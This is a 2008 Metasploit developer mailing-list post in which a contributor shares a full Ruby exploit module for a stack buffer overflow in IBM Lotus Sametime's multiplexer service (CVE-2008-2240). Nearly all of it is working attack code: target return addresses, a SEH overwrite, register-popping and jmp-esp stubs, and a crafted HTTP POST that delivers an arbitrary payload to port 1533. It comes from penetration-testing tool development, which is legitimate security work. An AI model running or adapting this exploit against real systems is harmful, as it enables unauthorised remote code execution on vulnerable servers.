Hi Patrick,
I saw you've added domino_sametime_stmux.rb to the dev svn.
I've wrote the same exploit a couple months ago, maybe you add some of my offsets/targets to your module.

Regards,
riaf

##
# $Id: ibm_lotus_sametime_stmux.rb 2008-06-01 20:00:00Z riaf $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IBM Lotus Sametime Community Services Multiplexer Stack Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in Lotus Sametime
				prior to version 7.5.1CF2 and 8.0.1. 
			},
			'Author'         => [ 'riaf' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
	  				['BID', '29310'],
					['CVE', '2008-2240'],
				],
			'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'seh',
                                },
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'           => 1024, 
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Lotus Sametime 7.5 Windows 2002 SP4', { 'Rets' => [ 0x7c3410c2, 3, 268 ] }],
					['Lotus Sametime 7.5 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
					['Lotus Sametime 7.5.1 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 5, 269 ] }],
					['Lotus Sametime 8.0.0 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
				],
			'DisclosureDate' => 'May 21 2008'))

			register_options( [ Opt::RPORT(1533) ], self.class )
	end

	def exploit
		connect

		pad1 = rand_text_alpha_lower(44)
		pad2 = rand_text_alpha_lower(29)
		popebx = "\x5b" * target['Rets'][1] 
		popad = "\x61" * target['Rets'][2]
		jmpesp = "\xff\x24\x24"
		jmp = "\x74\x23\x75\x21"
                seh = [target['Rets'][0]].pack('V')
		post = payload.encoded

		sploit = pad1 + jmp + seh + pad2 + popebx + popad + jmpesp

		print_status("Trying to exploit target #{target.name} 0x%.8x..." % target['Rets'][0])

		send_request_raw({
                        'uri'          => "/CommunityCBR/CC.39.#{sploit}/",
                        'method'       => 'POST',
			'headers'      => { 'Content-Length' => post.length },
			'data'	       => post 
                }, 5)		

		handler
	end

end



_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to